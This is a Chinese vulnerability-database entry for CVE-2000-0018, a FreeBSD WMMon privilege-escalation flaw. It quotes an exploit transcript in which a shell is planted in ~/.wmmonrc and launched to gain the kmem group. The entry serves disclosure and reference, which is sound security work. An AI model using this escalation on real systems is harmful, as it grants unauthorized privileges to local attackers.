FreeBSD WMMon权限提升漏洞

FreeBSD WMMon权限提升漏洞

漏洞ID 1105654 漏洞类型 输入验证
发布时间 1999-12-22 更新时间 2005-05-02
图片[1]-FreeBSD WMMon权限提升漏洞-安全小百科CVE编号 CVE-2000-0018
图片[2]-FreeBSD WMMon权限提升漏洞-安全小百科CNNVD-ID CNNVD-199912-078
漏洞平台 FreeBSD CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19685
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-078
|漏洞详情
FreeBSD中的WMMon存在漏洞,本地用户利用该漏洞通过.wmmonrc配置文件获得特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/885/info

WMMon is a multiple platform Window Maker docking application. It monitors useful system information such as CPU load and disk activity. The application also allows the user to define commands that can be launched by mouse clicks in the WMMon window. If the WMMon application is installed SUID or SGID, these privileges are not dropped before executing commands that have been defined by the user. Since the user can configure the application to execute any command, a user can run a shell or any other executable with the privileges that WMMon has been installed with. The FreeBSD ports version of WMMon installs SGID kmem and older versions installed it as SUID root. 

Exploit:
% id
uid=1000(steve) gid=1000(steve) groups=1000(steve)
% echo 'left /bin/sh' > ~/.wmmonrc
% wmmon -display myworkstation.evilhacker.net:0.0
Monitoring 2 devices for activity.
{Left-click on the little window that appears}
current stat is :1
$ id
uid=1000(steve) gid=1000(steve) egid=2(kmem) groups=2(kmem), 1000(steve)
|参考资料

来源:BID
名称:885
链接:http://www.securityfocus.com/bid/885
来源:OSVDB
名称:1169
链接:http://www.osvdb.org/1169

相关推荐: efFingerD sockFinger_DataArrival函数缓冲区溢出漏洞

efFingerD sockFinger_DataArrival函数缓冲区溢出漏洞 漏洞ID 1200512 漏洞类型 缓冲区溢出 发布时间 2004-12-31 更新时间 2004-12-31 CVE编号 CVE-2004-2272 CNNVD-ID CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享